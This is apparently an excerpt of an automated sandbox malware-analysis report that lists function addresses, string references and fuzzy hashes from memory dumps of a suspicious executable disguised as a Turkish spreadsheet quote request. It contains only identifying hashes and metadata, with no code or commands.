Instruction Fuzzy Hash: 44110376904240DFCB06DF00D5C4B56BF71FF94324F24C2A9D8090B256C33AE85ADBA1

Function 00F8D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090128119.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f8d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa938f9f09f309af6b54cd14ad92e9b43f3fc7be9c7887ba70a9be1913b2af8
Instruction ID: 01406e6d5daa03a12e48cd517ea13be3a6bc104d570f82fa95245f59324c4b1a
Opcode Fuzzy Hash: 9aa938f9f09f309af6b54cd14ad92e9b43f3fc7be9c7887ba70a9be1913b2af8
Instruction Fuzzy Hash: BC01DB725053449AE711AA29CDC47AAFFD8DF51334F28C45AED094B2C2D679DC40E771

Function 00F8D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090128119.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f8d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baab8c6c3c8287950b1e8390dcb9125bb388e28435d2e9492f501b0186a804e3
Instruction ID: 1b87079467c16de4315e27bcf937652a2e828cf242bc6df6d61565be400e33e4
Opcode Fuzzy Hash: baab8c6c3c8287950b1e8390dcb9125bb388e28435d2e9492f501b0186a804e3
Instruction Fuzzy Hash: 4FF06272504344AEE7109A19C984BA6FFD8EF91734F18C55AED084B2C6C2799844DB71

Non-executed Functions

Function 06C14E80 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2101926848.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc7ce3153c2044233a9a15ddbdb06732f11e1182d5249da89a9a1e216609c42
Instruction ID: ca7c1e9fcfb5fe8f2ea6959cff562b3062cb6c9c719c8832ef089d378ab912eb
Opcode Fuzzy Hash: fdc7ce3153c2044233a9a15ddbdb06732f11e1182d5249da89a9a1e216609c42
Instruction Fuzzy Hash: 36D19A75A006008FDB99EBB9C850BAEB7F6AF8A700F54846DD156CF391CB34D901DB51

Function 0287DE4C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80645afe9bcf892c38bf4c62640d14ef44eaaa4f3ff04f4549504b34001acb20
Instruction ID: b460b3d9901493567525a14c40534d63d18bedc4958787b121091ddb210faeb7
Opcode Fuzzy Hash: 80645afe9bcf892c38bf4c62640d14ef44eaaa4f3ff04f4549504b34001acb20
Instruction Fuzzy Hash: DFA16D3AA002098FCF15DFB9C98059EB7B2FF95305B1545AAE905EB265EB31ED05CF40

Function 02874B64 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd437d2044ebff616ba3914fbdbfca27c12ced1f2c9d0aa5d756acf67f3831f
Instruction ID: 97a7dbece414c2735c441b96e67574756ea931ae3640671a78f2cdf2009d8582
Opcode Fuzzy Hash: edd437d2044ebff616ba3914fbdbfca27c12ced1f2c9d0aa5d756acf67f3831f
Instruction Fuzzy Hash: C1510A5FD9095687EF1750AB48643D717A2C3BB12CF109348D22CEB7E2FAA4D983C256

Analysis Process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exePID: 7360, Parent PID: 5664COMMON

Executed Functions

Function 0167C146 Relevance: 6.5, Strings: 5, Instructions: 227COMMON

Download Yara Rule

Strings

LjFp, xrefs: 0167C38D
0oFp, xrefs: 0167C20A
LjFp, xrefs: 0167C377
PHcq, xrefs: 0167C3EF
PHcq, xrefs: 0167C400

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 24ee993d0dbbd1903657130ca59637922d8fb845b1dfebc39e3b83b80f5c4409
Instruction ID: 58fbd0d2c21ab3a574a85d021d6d14d167ebfc4bf2841f5e5b321f3e04143a11
Opcode Fuzzy Hash: 24ee993d0dbbd1903657130ca59637922d8fb845b1dfebc39e3b83b80f5c4409
Instruction Fuzzy Hash: D9A1E674E00219CFDB14DFA9D884A9DBBF2FF89310F1480AAE919AB365DB349941CF51

Function 01675362 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

LjFp, xrefs: 01675550
PHcq, xrefs: 016755C8
0oFp, xrefs: 016753E2
LjFp, xrefs: 01675566
PHcq, xrefs: 016755D9

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 7844da5cba6dbcbab5a367bc2dcfb6440b7d8a91ee0b2e56482362a777c9bfbe
Instruction ID: 4178055f010e18f6aa4411c9620140a34805a3256e77d2ea276d1ccf2e984fca
Opcode Fuzzy Hash: 7844da5cba6dbcbab5a367bc2dcfb6440b7d8a91ee0b2e56482362a777c9bfbe
Instruction Fuzzy Hash: A7919274E01218DFEB14DFA9D984A9DBBF2BF89310F14C0A9E809AB365DB349945CF50

Function 0167C468 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

LjFp, xrefs: 0167C647
PHcq, xrefs: 0167C6D0
LjFp, xrefs: 0167C65D
PHcq, xrefs: 0167C6BF
0oFp, xrefs: 0167C4DA

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: aff0b136c70370c7d5e5a62014d0614bce21d9da55303026a4af79997b3f5f9a
Instruction ID: d8de7badf7ffde9d7b0b5d07caac85b33b1c481e202b02eed8036120834d48e1
Opcode Fuzzy Hash: aff0b136c70370c7d5e5a62014d0614bce21d9da55303026a4af79997b3f5f9a
Instruction Fuzzy Hash: 8281C474E00219CFEB14DFAAD884A9DBBF2BF88300F14C06AE419AB365DB359941CF50

Function 0167CA08 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

PHcq, xrefs: 0167CC5F
PHcq, xrefs: 0167CC70
0oFp, xrefs: 0167CA7A
LjFp, xrefs: 0167CBE7
LjFp, xrefs: 0167CBFD

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: d38131062266055ef3539584084617371c4c1ea125da24e1bbbbec9a9c9cd9ee
Instruction ID: c3df7c5acf92711165c7daed66d566991cd95a7a499399b3ee0b13eae643e16d
Opcode Fuzzy Hash: d38131062266055ef3539584084617371c4c1ea125da24e1bbbbec9a9c9cd9ee
Instruction Fuzzy Hash: A7819074E00219CFDB14DFAAD984A9DBBF2BF88310F14C069E819AB365DB349985CF50

Function 0167D278 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjFp, xrefs: 0167D46D
0oFp, xrefs: 0167D2EA
PHcq, xrefs: 0167D4CF
LjFp, xrefs: 0167D457
PHcq, xrefs: 0167D4E0

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: d33d7d80d2bc72a8d0f8b62c15972af13884a6b1611cf95e373aa604e03ea898
Instruction ID: da5d012dd725333ea037db069addc12dbb13ede77a3209a57beb53b17e82dda2
Opcode Fuzzy Hash: d33d7d80d2bc72a8d0f8b62c15972af13884a6b1611cf95e373aa604e03ea898
Instruction Fuzzy Hash: EA81A274E01218CFDB14DFAAD984A9DBBF2BF89310F14C069E419AB365DB34A985CF50

Function 0167C738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjFp, xrefs: 0167C92D
0oFp, xrefs: 0167C7AA
PHcq, xrefs: 0167C98F
LjFp, xrefs: 0167C917
PHcq, xrefs: 0167C9A0

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: c5f209e32fddaf259c0e5f8b55ad535b2b9e1a3e141f1f5f86a296fcfc090cd1
Instruction ID: f4221678ead1ab5808b2cd8872f41c2c6fb8a9420f2936985204f9fbda5e8868
Opcode Fuzzy Hash: c5f209e32fddaf259c0e5f8b55ad535b2b9e1a3e141f1f5f86a296fcfc090cd1
Instruction Fuzzy Hash: 0A81A074E00219DFDB54DFAAD984A9DBBF2BF88310F14C06AE819AB365DB349941CF50

Function 0167CCD8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjFp, xrefs: 0167CEB7
0oFp, xrefs: 0167CD4A
LjFp, xrefs: 0167CECD
PHcq, xrefs: 0167CF40
PHcq, xrefs: 0167CF2F

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 892fa1e83ece2e63281f3063555705a34772641db74d8c0035230f2bd25aaa93
Instruction ID: 4e9e72c9753c0bbe146a2ba59360a2ca062bc0713f0f2a71096fd58b6948febd
Opcode Fuzzy Hash: 892fa1e83ece2e63281f3063555705a34772641db74d8c0035230f2bd25aaa93
Instruction Fuzzy Hash: E7819F74E00219DFDB14DFAAD984A9DBBF2BF88300F24C069E419AB365DB349985CF51

Function 0167CFAA Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

0oFp, xrefs: 0167D01A
LjFp, xrefs: 0167D187
PHcq, xrefs: 0167D1FF
LjFp, xrefs: 0167D19D
PHcq, xrefs: 0167D210

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 51cca026722e5f7261c9f8467adb0c6449e5242ba6751b23dcaa80d5e65cc9b5
Instruction ID: 2f3b5fd100e260b15ecc1fc006aa33e996dfea7d70de704c48d5aaac0e83699d
Opcode Fuzzy Hash: 51cca026722e5f7261c9f8467adb0c6449e5242ba6751b23dcaa80d5e65cc9b5
Instruction Fuzzy Hash: 53818F74E00218CFDB14DFAAD984A9DBBF2BF88311F14C469E419AB365DB349985CF50

Function 01677118 Relevance: 5.4, Strings: 4, Instructions: 388COMMON

Download Yara Rule

Strings

,gq, xrefs: 01677298
(ocq, xrefs: 01677220
,gq, xrefs: 0167728A
(ocq, xrefs: 01677212

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq
API String ID: 0-2401767512
Opcode ID: 10a18ce61ccdbdad50442b60a0e0d9dd5f8aece475c5274f728fbf43c4477c41
Instruction ID: 3530c0658b5f9675ae0074c2d85a70b0b943a41adad90fb2d199fb6d1cc9e24c
Opcode Fuzzy Hash: 10a18ce61ccdbdad50442b60a0e0d9dd5f8aece475c5274f728fbf43c4477c41
Instruction Fuzzy Hash: EBF12830A11119CFDB15CF69D888AADBFB2FF88314F59806AE915EB365DB30E941CB50

Function 016729EC Relevance: 5.3, Strings: 4, Instructions: 317COMMON

Download Yara Rule

Strings

Xgq, xrefs: 01672AD8
Xgq, xrefs: 01672B57
Xgq, xrefs: 01672BA4
Xgq, xrefs: 01672A9E

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: Xgq$Xgq$Xgq$Xgq
API String ID: 0-1951159037
Opcode ID: 5e5abf100a66a5e0628edee5f4439625402f501d167d94c41559bdf2255c1ef1
Instruction ID: 337f11578e5322c03d9bcc9e52ded4806a8acd94fb83d6a893777b1da4283192
Opcode Fuzzy Hash: 5e5abf100a66a5e0628edee5f4439625402f501d167d94c41559bdf2255c1ef1
Instruction Fuzzy Hash: 68A1E171E04329CFCBE1CF78C8942AABBB1FF94320F14466ED54596641EB319D85CB92

Function 0167A088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON

Download Yara Rule

Strings

(ocq, xrefs: 0167A518
4'cq, xrefs: 0167AB13

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (ocq$4'cq
API String ID: 0-3004416391
Opcode ID: 9fa48c7783f3dc92d716e958f5fe756c553092e696898ed2144113eee0244fd5
Instruction ID: 1409420eb33032537ac53b2296660536c1e4a447a10dd27bbf7a170f559be2cc
Opcode Fuzzy Hash: 9fa48c7783f3dc92d716e958f5fe756c553092e696898ed2144113eee0244fd5
Instruction Fuzzy Hash: E3829075A00209DFCB15DFA8C984AAEBBF2FF88310F198559E9059B366D734ED81CB50

Function 016769A0 Relevance: 3.0, Strings: 2, Instructions: 514COMMON

Download Yara Rule

Strings

(ocq, xrefs: 01676EDA
Hgq, xrefs: 01676DA6

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (ocq$Hgq
API String ID: 0-2239030825
Opcode ID: c19e22daf3c04a253a0432bb0b32a14f8b980905e67b460cd0165b1716987ea4
Instruction ID: fe85e573027f764cde41500c1a626d5f32e3cae86743de6b79857eaff40a6eb5
Opcode Fuzzy Hash: c19e22daf3c04a253a0432bb0b32a14f8b980905e67b460cd0165b1716987ea4
Instruction Fuzzy Hash: 96128B71A106198FDB15DF69C854BAEBBF6FF88300F108569E9069B391EF349D81CB90

Function 01673B8C Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

Xgq, xrefs: 01673CCD
Xgq, xrefs: 01673CF6

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: Xgq$Xgq
API String ID: 0-2113765878
Opcode ID: 097174a641e3f41fa8a0d9d7201da249b34fb575d522c7b13c3cf3ccb44bb2c6
Instruction ID: 5624e7ae8125e7a83cc2ad204a4a23dc2908f1d74e4f1ce62b9987ac5dd1a4d4
Opcode Fuzzy Hash: 097174a641e3f41fa8a0d9d7201da249b34fb575d522c7b13c3cf3ccb44bb2c6
Instruction Fuzzy Hash: 3B514837B18311CBCBA9CA398C952BBBAA2FB80310B48447ED802C7741D775CC45AB51

Function 05B97D78 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PHcq, xrefs: 05B97FB2
PHcq, xrefs: 05B97FC3

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: PHcq$PHcq
API String ID: 0-4229179212
Opcode ID: 7ddec8463f7056fcdb53755af1acd40cc8223421a27e33eaa6c4b179f379726f
Instruction ID: faeeb761ca46ca32ab6d33104de78b4dd0476c5c355dd0d22d091aa94680f498
Opcode Fuzzy Hash: 7ddec8463f7056fcdb53755af1acd40cc8223421a27e33eaa6c4b179f379726f
Instruction Fuzzy Hash: FF818E74E002188FDB58DFA9D994BADBBF2FF89300F20816AD419AB294DB346945CF50

Function 05B97720 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5612b84c058be637ddf3c1b1c44a99c85d1c9415edddc57dcbe6670141461dcb
Instruction ID: e7e0aef3fbc88ae8183b3fa7f13c13fa9575616dff603a41b6665ba821c7b4bf
Opcode Fuzzy Hash: 5612b84c058be637ddf3c1b1c44a99c85d1c9415edddc57dcbe6670141461dcb
Instruction Fuzzy Hash: 4FE19E74E01218CFEB64DFA5C984B9DBBB2FF89300F2081A9D409A7295DB395E85CF50

Function 05B98B58 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ed06672125c3421c7e27f590fd15935dc782e9e7a039584704b7db4127bf1f
Instruction ID: 76951088bafc35595f5e331e20a9f4aad3724fa1afada0fcf44ba99c2f334918
Opcode Fuzzy Hash: d2ed06672125c3421c7e27f590fd15935dc782e9e7a039584704b7db4127bf1f
Instruction Fuzzy Hash: 17D1AB78E006188FDB55DFA9C984B9DBBB2FF89300F1080A9D909AB355DB396D85CF50

Function 0167E97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e772181e783786f226ff5c387ef0f4773655f18e5cba81fac355c2343081f88b
Instruction ID: 73d27841da8c2d29862fc236b0881bf2a2ce247913d7b7019aa755421d40cd97
Opcode Fuzzy Hash: e772181e783786f226ff5c387ef0f4773655f18e5cba81fac355c2343081f88b
Instruction Fuzzy Hash: E251D574E00608DFDB18DFAAD984A9DBBB2FF88300F24C069E915AB365DB359845CF14

Function 0167E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc45b63bfd01755bb1776a7432e997e3c06799a369f01b9f68ecc984ec067c3
Instruction ID: 49b6c95c1781de166e9bf0432a1b1b55f7f73862c43781a05ecaf4a1ec27a366
Opcode Fuzzy Hash: dbc45b63bfd01755bb1776a7432e997e3c06799a369f01b9f68ecc984ec067c3
Instruction Fuzzy Hash: B551D674E00608DFDB18DFAAD984A9DBBB2FF88300F20C069E915AB365DB355845CF54

Function 05B97711 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51794dede51d72a0814f358f46a705be8d34563e38ac3486753f4ee8cb63b4f3
Instruction ID: a2d60052ecb3fa712847fe47f1bf7171a325e211520b445c0bd11e461103047f
Opcode Fuzzy Hash: 51794dede51d72a0814f358f46a705be8d34563e38ac3486753f4ee8cb63b4f3
Instruction Fuzzy Hash: F741A2B4D016088BEB18DFAAC8947DDBAF2FF89300F24C4A9C419BB264DB755946CF54

Function 05B9771F Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba30ca9a61559e518c6f16f222d49857cd3e5927cce2cd05cbfafbcf2f67842
Instruction ID: aaba3274fb6c61b8a8ac34172d561afb47cdb2d1f41016f6d3413333e55726bf
Opcode Fuzzy Hash: 0ba30ca9a61559e518c6f16f222d49857cd3e5927cce2cd05cbfafbcf2f67842
Instruction Fuzzy Hash: 7041B0B0E016088BEB18DFAAC9547DDBAF2FF89300F24C4AAC418BB254DB355946CF54

Function 05B98B49 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74576ea2d77d45d169eb102b8a5a174f72acd0621759162c55ea397f56506c99
Instruction ID: 1035844496ed234bd10e1d54e3d995407df33937cdbab2b951ddd3ce8a8cb501
Opcode Fuzzy Hash: 74576ea2d77d45d169eb102b8a5a174f72acd0621759162c55ea397f56506c99
Instruction Fuzzy Hash: 28410475E016088BEF08CFAAD984ADDBBF2AF89300F14D179D419BB264DB385946CF40

Function 016776F1 Relevance: 10.5, Strings: 8, Instructions: 472COMMON

Download Yara Rule

Strings

(ocq, xrefs: 01677C0F
(ocq, xrefs: 01677BFF
(ocq, xrefs: 01677815
(ocq, xrefs: 016777E9
(ocq, xrefs: 016778B2
,gq, xrefs: 01677BA0
(ocq, xrefs: 0167772E
,gq, xrefs: 01677B90

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-3338910979
Opcode ID: c9a2087d6f12cdf2e3624381eba675c2a91717d0eff0fa5bc17917f0a1f87754
Instruction ID: 941df8e35d034f44e0047bbb8c1435df3ef0136a40d8ae3ef95c3c876e7935b0
Opcode Fuzzy Hash: c9a2087d6f12cdf2e3624381eba675c2a91717d0eff0fa5bc17917f0a1f87754
Instruction Fuzzy Hash: 7B124B30A006098FCB15CF68D888AAEBBF2FF88314F558569E519DB361DB30ED41CB90

Function 01675F38 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

Hgq, xrefs: 01676056
Hgq, xrefs: 01676023

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: e3161b4027858fd971fdf1755e4890b9ed8cb6737ddd43ca8aa7a1d4288f988a
Instruction ID: 46af907d17abb79cf80b484421994a390c01098ba8908a26522f88665a0693c2
Opcode Fuzzy Hash: e3161b4027858fd971fdf1755e4890b9ed8cb6737ddd43ca8aa7a1d4288f988a
Instruction Fuzzy Hash: 58919F703046458FEB169F28DC59A6E7FF2BF89301F088469E5468B392DF389C45DB91

Function 01676498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,gq, xrefs: 01676578
,gq, xrefs: 0167656E

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: ,gq$,gq
API String ID: 0-2533611571
Opcode ID: 4621d6d86e72f0732985b65ed51f10fb4ae56d487ee49c73e2a2b23c0bea5f17
Instruction ID: 46738cb7bc6e18f23661cf6fbf9fde3fde92a30172b947c03dafe4ab924a1e08
Opcode Fuzzy Hash: 4621d6d86e72f0732985b65ed51f10fb4ae56d487ee49c73e2a2b23c0bea5f17
Instruction Fuzzy Hash: CC81AF74B00915CFEB14CF6DCC84A6ABBB2FF89310B958169D506E7365DB31E841CB92

Function 05B98610 Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

(&cq, xrefs: 05B9872B
(gq, xrefs: 05B987EA

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (&cq$(gq
API String ID: 0-4012885273
Opcode ID: ca4fbf46292324fa714b6dee3df316cedbe9f19f61c5d8ae5c598de1ea96c7f7
Instruction ID: 046d31aeab4e0a53de8a29971ee8e49917775d8d336d8fbe9d36849d37aadd8f
Opcode Fuzzy Hash: ca4fbf46292324fa714b6dee3df316cedbe9f19f61c5d8ae5c598de1ea96c7f7
